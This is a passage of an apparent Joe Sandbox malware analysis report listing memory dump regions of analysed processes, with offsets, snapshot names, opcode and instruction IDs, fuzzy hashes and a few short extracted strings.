                                                                                                                    • Instruction Fuzzy Hash: C8F0C231648A0A8FCB54DF04C494FA973F1FBA8351F1586A9D00ED72A0DA34AA85DF81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                    • Instruction ID: 928c070d74d26ccce10167143bd1c06356ae35c5ebcfbe662cdca401fc802eaf
                                                                                                                    • Opcode Fuzzy Hash: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                    • Instruction Fuzzy Hash: BCF0B430B0D21E4BEE75AA8894605BC3350EF94310F030378D40EC31BBCD28AA064284
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a3ac26a6bd917dab9a66afb60f84bdefc0bf9187c1d08abc1ff8faa564529da9
                                                                                                                    • Instruction ID: dbebe2a77b4d3de2b8f41ec8164a8b650ee7ddbc61fa246fed0ee07b12bf9b02
                                                                                                                    • Opcode Fuzzy Hash: a3ac26a6bd917dab9a66afb60f84bdefc0bf9187c1d08abc1ff8faa564529da9
                                                                                                                    • Instruction Fuzzy Hash: 53F0EC26B585414BD308F72CD8F58E433A0DF4612A74981F2D04ECE1A7DD1594488750
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 56814d0bc372d442043a2ee71ef02d2861c87ff482bb0cd57b77c56c2ad34b65
                                                                                                                    • Instruction ID: 431dfdbf7836d8e52bbd6fdb90ea7bdc0409a64170a6d9dc5feaf5feac4dd13d
                                                                                                                    • Opcode Fuzzy Hash: 56814d0bc372d442043a2ee71ef02d2861c87ff482bb0cd57b77c56c2ad34b65
                                                                                                                    • Instruction Fuzzy Hash: E6F0E226F0F6855FD3291B7848754A43B609F6F26170B00F7C099CB5F3DC19AD048701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11e72db5e8bafde69ce7393efd214c18862aea70d9226c1ec66b1011b54606d2
                                                                                                                    • Instruction ID: e8df105daa0a2ce2a4ab427905eacd71cd44c439d26d2e660c524099327813fb
                                                                                                                    • Opcode Fuzzy Hash: 11e72db5e8bafde69ce7393efd214c18862aea70d9226c1ec66b1011b54606d2
                                                                                                                    • Instruction Fuzzy Hash: 15F0396092D7C44FC702AB3888544247FF0EF1710978A02EBD4CACA5B3EA19884AC312
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 25f7dcac7f94a606b9968431c9d73ad2c48ee120ae991e56abe1da4e0246abcc
                                                                                                                    • Instruction ID: 0111817a30ab5ef83f69fe8e8f49f1be3715bd128e749241e63f8ebd7d7b609e
                                                                                                                    • Opcode Fuzzy Hash: 25f7dcac7f94a606b9968431c9d73ad2c48ee120ae991e56abe1da4e0246abcc
                                                                                                                    • Instruction Fuzzy Hash: FAE0D82071AB884FC70D9B3888684607BB1EFA611278952EBC405CB2E3ED19DC89C751
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d6d8a4b2683d4f5c1c10896849afd54f99ed7eff97fcf72542c9ccec68b240ad
                                                                                                                    • Instruction ID: 76610f001d81add3ddac74f65ac82acaad5bf9a4de00e9800882e203a8674509
                                                                                                                    • Opcode Fuzzy Hash: d6d8a4b2683d4f5c1c10896849afd54f99ed7eff97fcf72542c9ccec68b240ad
                                                                                                                    • Instruction Fuzzy Hash: 80E09220B9E7C40FCB0AA63848680607FB1EF6B10178D12FAC486CB293D918DC8AC751
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb4da9fbff92f6316001d3a1e27a52cebcdf001950c02f931d2a358ff1bf2384
                                                                                                                    • Instruction ID: 248747f82cb998ff603068f7baafd5ecf08322b978490b6183e3774c05b9c8ec
                                                                                                                    • Opcode Fuzzy Hash: bb4da9fbff92f6316001d3a1e27a52cebcdf001950c02f931d2a358ff1bf2384
                                                                                                                    • Instruction Fuzzy Hash: DEE09220B197844FC709963888644607BB1EF6B11278A52FAC446CB2A3E919DC85C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8614cdcb45eb7306ba3fecf2eef229044448bccd30f6c508e677621028d00cbf
                                                                                                                    • Instruction ID: 73cdc400db3dde50ad1e6cfb4e978f96d26da2d403daffe184784edd3e5150bb
                                                                                                                    • Opcode Fuzzy Hash: 8614cdcb45eb7306ba3fecf2eef229044448bccd30f6c508e677621028d00cbf
                                                                                                                    • Instruction Fuzzy Hash: 82E08020649B444FC7096B2488955503BB1DF6721174A00E6D045CF1B3D51DDC49C711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =N_^$N_^%$N_^($N_^*$N_^+$N_^2$N_^4
                                                                                                                    • API String ID: 0-1975945381
                                                                                                                    • Opcode ID: ead795f3082a5b0d8de7ed053cbd4e31487b3479410fb032dc5d0ac12dcca313
                                                                                                                    • Instruction ID: 12fb3e0747269d8c57731d47c99d247bc52a000c5d81f98526bea7302f477ab5
                                                                                                                    • Opcode Fuzzy Hash: ead795f3082a5b0d8de7ed053cbd4e31487b3479410fb032dc5d0ac12dcca313
                                                                                                                    • Instruction Fuzzy Hash: 3F51855BF0C56609E319B7A8396A9FD3724DF8133EB26C6B3E12E890D78C1C658241D9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5\_H
                                                                                                                    • API String ID: 0-3325266018
                                                                                                                    • Opcode ID: 2db8a51b1c9d50f43f069101daded99c4bbbee0297b790d2f9ebd8529b51ecd9
                                                                                                                    • Instruction ID: f028cef345db4126654a92473e2d531f276947760d0f9adc1a102cdf8d0d11d3
                                                                                                                    • Opcode Fuzzy Hash: 2db8a51b1c9d50f43f069101daded99c4bbbee0297b790d2f9ebd8529b51ecd9
                                                                                                                    • Instruction Fuzzy Hash: 08910175A09A8D5FE799EF688869BA97BE0FB95704F0001BED049C73E2CB782410C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 948800d593c87a16d451f9582324c9e7ad88bdc02ce63323ba382857a882ea37
                                                                                                                    • Instruction ID: 0b23f58c4501db2ea9a819a34f77f8f89d17e9a2a786156ec3b5bf20e285f802
                                                                                                                    • Opcode Fuzzy Hash: 948800d593c87a16d451f9582324c9e7ad88bdc02ce63323ba382857a882ea37
                                                                                                                    • Instruction Fuzzy Hash: 79413726F0C6590EE314F7B860A9AFD7791EF89329B1541FBD04DC72EBCD18A84182C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d1fc204a0a5cbf2d65b3d2b887b89a934a728040c3aa722c498338c594f16746
                                                                                                                    • Instruction ID: b9c9cb416522cb629afafa3e564b81a54ab1637b8f08b0d3d1fc2238fef32e43
                                                                                                                    • Opcode Fuzzy Hash: d1fc204a0a5cbf2d65b3d2b887b89a934a728040c3aa722c498338c594f16746
                                                                                                                    • Instruction Fuzzy Hash: 58412826F0C6590EE314F77860A9AFC7791EF89329B1585FBD04DC72EBCD18A84182C5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5a1dc5bf9fcbe707315008ae000572c4f19dd5689cb0a67e04ac28f49a5618a5
                                                                                                                    • Instruction ID: b6e7ef216cf56280b893bc47151f2c6ce2dedd8d92134d1f464dfaea68c91eee
                                                                                                                    • Opcode Fuzzy Hash: 5a1dc5bf9fcbe707315008ae000572c4f19dd5689cb0a67e04ac28f49a5618a5
                                                                                                                    • Instruction Fuzzy Hash: 7831D726F1CA5D1FE358F768646AAF973D1DB88329B1141FEE40EC32EBDD18AC414285
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c968a4df1d1d232117db49736caceadcc59a0bfe5e719c71516d431abc7a87c5
                                                                                                                    • Instruction ID: 25c44edd11c01d061e5474e2b5c8343003d115e5be8aebc2588ab53844054bea
                                                                                                                    • Opcode Fuzzy Hash: c968a4df1d1d232117db49736caceadcc59a0bfe5e719c71516d431abc7a87c5
                                                                                                                    • Instruction Fuzzy Hash: 5221C820B19A1D1FE798F76C9469A7973C2EB98315B5101BDE80DC33FBDD28EC418281
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a1bda7a0783d90b4d1711479b6756be6928a9ea02e375703d4856adedf2c6c1c
                                                                                                                    • Instruction ID: 602480df81df5eed0aa5dbc7b6e8438c6d89473bea095e77da256c0f85abf3a5
                                                                                                                    • Opcode Fuzzy Hash: a1bda7a0783d90b4d1711479b6756be6928a9ea02e375703d4856adedf2c6c1c
                                                                                                                    • Instruction Fuzzy Hash: D3210736F0D34D9FE722F6A898550EC7B70EF41324F1582B7D0488A1E3D93826468795
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1daf68b7c61757d4b8d83812ebec9af404e90fc19a47d21ad49c9de39bf35872
                                                                                                                    • Instruction ID: 0d391515fc07ef03a31cf2dc1c8315fc911efdd541fd14fd3b9c2be4f1328173
                                                                                                                    • Opcode Fuzzy Hash: 1daf68b7c61757d4b8d83812ebec9af404e90fc19a47d21ad49c9de39bf35872
                                                                                                                    • Instruction Fuzzy Hash: CC11A720E0DA1D5FE7B4F65494A46B872D0FF14700F5102BDD44EE33B2EE28AE404744
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 60959e3fa99561a3c17493bd02af8b62a82457fa20571028c8dfab3489e22b49
                                                                                                                    • Instruction ID: c458a676dde66a53cebb3ce0ea3d5b4d769a7e12eebd8079ac22dfe41ac5d97a
                                                                                                                    • Opcode Fuzzy Hash: 60959e3fa99561a3c17493bd02af8b62a82457fa20571028c8dfab3489e22b49
                                                                                                                    • Instruction Fuzzy Hash: 9A11A335A0D34D9FE721EBA8C8641EC7BB0EF41714F1646BBC044DB2E2D53416058790
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 04d495dd8f53577a9b3b2684c9ea670c3204e299b2f4c71346d8ede69bf848c0
                                                                                                                    • Instruction ID: ff2e18d9f879a8769d3b710e4d5e603e0745faa1cf387ee92f2f8b3df862c45b
                                                                                                                    • Opcode Fuzzy Hash: 04d495dd8f53577a9b3b2684c9ea670c3204e299b2f4c71346d8ede69bf848c0
                                                                                                                    • Instruction Fuzzy Hash: E8018035A0E3899FD721EB64C8541ACBFB0EF42304F1542FBC4449B2A2DA3456448780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                    • Instruction ID: 6e117fa735203e50fe7fc78efa1fd2cc2c3a585ce16cb8b95babeaa274b5e41c
                                                                                                                    • Opcode Fuzzy Hash: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                    • Instruction Fuzzy Hash: 0A016230A0951E5EEB74BA40D8647F872A0FB64310F1102BEC44EE32B2EE286E818A45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff33ab786e1f44efe491ee6d576271f61ccbc4d77c7eee1e1753fad1f8dfc8c6
                                                                                                                    • Instruction ID: 4a0c6a9369a947ddeeec373df7eb990435c2297ff1e5eff29b4a9b1529d444c3
                                                                                                                    • Opcode Fuzzy Hash: ff33ab786e1f44efe491ee6d576271f61ccbc4d77c7eee1e1753fad1f8dfc8c6
                                                                                                                    • Instruction Fuzzy Hash: 9DF0C231648A09CFCB54EF04C495FA973F1FB98315F1586A9D00ED7260DA35AA85DF81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dfdc7124db56dd2636347f1540b50d2bd757e5c53671a7bdcd6932ab7d506b43
                                                                                                                    • Instruction ID: e44a74d622a26814dc411c5fba3bdab8f58ad4cffd7a4f357428296646858541
                                                                                                                    • Opcode Fuzzy Hash: dfdc7124db56dd2636347f1540b50d2bd757e5c53671a7bdcd6932ab7d506b43
                                                                                                                    • Instruction Fuzzy Hash: 15012134E0E3899FD721EB6484945ADBFB0EF45304F1542EBC4449B2A6DA3456448781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                    • Instruction ID: cfcbeed02ba4241a801e1ce93dccab27724e6c6dde89140e42c978bb66d692c5
                                                                                                                    • Opcode Fuzzy Hash: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                    • Instruction Fuzzy Hash: 55F09630A0D50E5BEA74F644D4A56F833D1EF14300F1102BDD84EE33B2DD28BE954685
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction ID: 3ba68f50efb7a8f958bc3679fac23d9f33a696edc02a5dbcee2413c6c7eede2f
                                                                                                                    • Opcode Fuzzy Hash: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction Fuzzy Hash: 0EE01A74F0D61E97F768B284C8617F97265EB88300F15027CDA1EE33E2CE28AE418655
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.1931162479.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9b7c0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    • Instruction ID: c2d3d56fc184a97bda6dbff624882d20c8ec96e7f8124a1900a770a5dc31be8d
                                                                                                                    • Opcode Fuzzy Hash: 61f1f0bff3c2cd9053e84af1bd2fcf9a365a0b39b9b9597fdbb5684ded6939a6
                                                                                                                    • Instruction Fuzzy Hash: 3D018035A0E38D8FD722DBA8886509CBFB0EF46700F1642E7C044DB1B2D9345A458741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                    • Instruction ID: c022d6248878a4bf0d6882370fe0fde32f1d4e6e038dd653131c1aa59c018b79
                                                                                                                    • Opcode Fuzzy Hash: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                    • Instruction Fuzzy Hash: 86018630A0951E4EEB78EB84D8657F873A0FF54300F1102FAC44EE31B2EE286E918B41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ca31839d6e060c61fff81f420571996c7c782d8800adbb5e53c6c57fff4e29fa
                                                                                                                    • Instruction ID: d67bd64d4e33f746b6cec69db58676926d0097087bb3d555c1ea295705898b75
                                                                                                                    • Opcode Fuzzy Hash: ca31839d6e060c61fff81f420571996c7c782d8800adbb5e53c6c57fff4e29fa
                                                                                                                    • Instruction Fuzzy Hash: 64017C35E0E38D9FE722DBA8886549CBFB0EF06704F1642E7C044DB1B2E9385A448741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 00210f38a21297454cba502408752b439d1ecd88c6a798c271d5d895893ca0bc
                                                                                                                    • Instruction ID: 9919502bac23dda274235eb2ad2113917a143c6e7e2294ea7a3c1832928d6d2f
                                                                                                                    • Opcode Fuzzy Hash: 00210f38a21297454cba502408752b439d1ecd88c6a798c271d5d895893ca0bc
                                                                                                                    • Instruction Fuzzy Hash: C1F0C231648A0A8FCB54DF04C494FA973B1FB98311F1586A9D00ED7260DA34AA85DF81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                    • Instruction ID: 7d9e36f198f3f241726ac99004285ac137ef8fbea0ecd0dfb3ddb2f3111064dd
                                                                                                                    • Opcode Fuzzy Hash: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                    • Instruction Fuzzy Hash: FBF03030A0960E4AEAB8E754D4666F833A1EF54300F1142B9D85EE72B2DE29BE958741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.1932553631.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 722b7d09a3da5f298d46c8311e908dced07fc104a4f23c91bc6d4aa99059930b
                                                                                                                    • Instruction ID: 6f4ab03e8ef1b4a5e8005f8c97f1c9cecc5d54058d762a64fd2462ab378e8403
